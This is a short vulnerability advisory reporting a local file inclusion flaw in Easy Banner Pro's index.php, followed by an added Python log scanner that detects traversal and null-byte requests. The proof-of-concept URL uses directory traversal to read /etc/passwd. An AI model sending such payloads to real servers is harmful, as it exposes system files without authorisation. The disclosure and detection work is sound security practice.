Easy Banner Pro Local File Inclusion

2012.08.25
Credit: Yakir Wizman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

-----------------------------------------------------------
Easy Banner Pro (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.phpwebscripts.com/easybannerpro/
Demo - http://www.scripts-demo.com/easybannerpro/
ISRAEL
-----------------------------------------------------------
Author will not be responsible for any damage.
-----------------------------------------------------------
About the Application
-----------------------------------------------------------
Easy Banner Pro is an advanced and very easy to use PHP script for running your own banner exchange system.

Proof Of Concept
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL : http://server/easybannerpro/index.php?page=../../../../../../../../../../etc/passwd%00
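
For defenders reviewing web server logs, the request shape in the proof of concept (directory traversal plus a trailing %00 in the `page` parameter of index.php) can be flagged as sketched here. This is an added example, not part of the original advisory or the vendor's code; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the advisory); IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2012:10:00:01 +0000] "GET /easybannerpro/index.php?page=rules HTTP/1.1" 200 5120',
    '192.0.2.44 - - [25/Aug/2012:10:00:07 +0000] "GET /easybannerpro/index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 1873',
    '192.0.2.44 - - [25/Aug/2012:10:00:09 +0000] "GET /easybannerpro/index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1873',
    '192.0.2.77 - - [25/Aug/2012:10:02:30 +0000] "GET /easybannerpro/index.php?id=4&page=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 404 312',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# ".." as a whole path segment, with either slash style.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_page_param(raw_value):
    """Return the reasons a raw `page` value looks like a file-inclusion attempt."""
    value = fully_decode(raw_value)
    reasons = []
    if TRAVERSAL_RE.search(value):
        reasons.append("traversal")
    if "\x00" in value:
        reasons.append("null-byte")
    return reasons

def scan(lines, param="page"):
    """Return (client_ip, raw_value, reasons) for each suspicious request line."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for pair in urlsplit(match.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            reasons = classify_page_param(raw) if name == param else []
            if reasons:
                findings.append((line.split()[0], raw, reasons))
    return findings
```

Calling `scan(SAMPLE_LOG)` returns one tuple per flagged request; the response status and size in the log line then indicate whether the include succeeded.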

References:

http://www.scripts-demo.com/easybannerpro/



Copyright 2024, cxsecurity.com

 
